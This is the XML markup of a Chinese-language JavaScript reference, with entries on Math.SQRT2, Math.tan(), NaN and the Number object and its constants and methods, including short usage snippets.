    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.SQRT2</w:t>
      </w:r>
      <w:r>
        <w:t>是常量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142335" cy="146649"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="90" name="00090.jpeg" descr="figure_0801_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0.jpeg" descr="figure_0801_0091"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142335" cy="146649"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>，即</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>的平方根。这个常量的近似值为</w:t>
      </w:r>
      <w:r>
        <w:t>1.414 213 562 373 095</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="706" w:name="Math_tan__"/>
      <w:r>
        <w:t>Math.tan()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="706"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算正切值</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Math.tan(x)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个角度，单位为弧度制。可以通过乘以</w:t>
      </w:r>
      <w:r>
        <w:t>0.017 453 293(2π/360)</w:t>
      </w:r>
      <w:r>
        <w:t>的方式，将角度转换为弧度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>给定角度</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的正切值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="707" w:name="NaN"/>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="707"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>非数字属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NaN</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NaN</w:t>
      </w:r>
      <w:r>
        <w:t>是一个全局属性，指向一个特殊的非数字值。</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>属性不可用</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环枚举，也不能用</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作符删除。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>不是常量，不可将它设置为任何其他值，有些操作应谨慎地避免。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要检查一个值是否为数字，可使用</w:t>
      </w:r>
      <w:r>
        <w:t>isNaN()</w:t>
      </w:r>
      <w:r>
        <w:t>，因为</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>总是与其他值不相等，甚至与它自身也不相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>isNaN()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.NaN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="708" w:name="Number"/>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:bookmarkEnd w:id="708"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:t>数字</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Number(value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number(value)</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lastRenderedPageBreak/>
        <w:t>正在创建的</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象的数值，或将转换为一个数字的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>Number()</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符用做构造函数时，它将返回一个新构造的</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象。当</w:t>
      </w:r>
      <w:r>
        <w:t>Number()</w:t>
      </w:r>
      <w:r>
        <w:t>当做函数调用而没有</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符时，它将传入的参数转换为一个原始的数值并返回这个值（如果转换失败则返回</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number.MAX_VALUE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>能表示的最大数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number.MIN_VALUE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>能表示的最小数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number.NaN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>非数字值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number.NEGATIVE_I</w:t>
      </w:r>
      <w:r>
        <w:t>NFINITY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>负无穷，当溢出时返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Number.POSITIVE_INFINITY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正无穷，当溢出时返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用指定的进制，将一个数字转换为字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个数字转换为本地数字格式的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toFixed()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个数字转换为包含指定小数位数的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toExponential()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个数字转换为指数记数法，在小数点后有指定位数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toPrecision()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个数字转换为字符串，使用指定数目的有效数字。根据数字的大小以及指定的有效数字位数，可能会采用指数或浮点记数法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象的原始值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数字是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中基本的原始数据类型。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>也支持</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象，它是一个原始数值的包装对象。在需要时，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会自动在原始形式和对象形式之间转换。可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>Number()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数来显式地创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象，虽然很少需要这样做。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数也可以不带</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符使用，此时它将</w:t>
      </w:r>
      <w:r>
        <w:t>作为一个转换函数。以这种方式调用时，它将尝试将传入的参数转换为一个数字，并返回转换结果（一个原始数值或</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数也用做</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个常用的数字常量的占位符：可表示的最大及最小的数字，正、负无穷大，以及特殊的</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>值。注意，这些值是</w:t>
      </w:r>
      <w:r>
        <w:t>Number()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数本身的属性，而不是各个数字对象的属性。例如，可以像下面这样使用</w:t>
      </w:r>
      <w:r>
        <w:t>MAX_VALUE</w:t>
      </w:r>
      <w:r>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var biggest=Number.MAX_VALUE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但不可以这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var n=new Number(2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var biggest=n.MA</w:t>
      </w:r>
      <w:r>
        <w:t>X_VALUE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但除此之外，</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>和其他方法也是每个</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>Number()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的方法。上面提到过，在需要时</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会自动将原始数值转换为</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象，这就是说，可以对于原始数值以及</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象使用</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var value=1234;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var binary_value=n.toString(2);</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Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Math</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="709" w:name="Number_MAX_VALUE"/>
      <w:r>
        <w:t>Number.MAX_VALUE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="709"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最大的数值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number.MAX_VALUE</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Number.MAX_VALUE</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中可以表示的最大的数。它的值约为</w:t>
      </w:r>
      <w:r>
        <w:t>1.79E+308</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="710" w:name="Number_MIN_VALUE"/>
      <w:r>
        <w:t>Number.MIN_VALUE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="710"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最小的数值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number.MIN_VALUE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number.MIN_VALUE</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中可以表示的最小的数（指非常接近于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是最大的负数）。它的值约为</w:t>
      </w:r>
      <w:r>
        <w:t>5E-324</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="711" w:name="Number_NaN"/>
      <w:r>
        <w:t>Number.NaN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="711"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>特殊的非数字值</w:t>
      </w:r>
    </w:p>
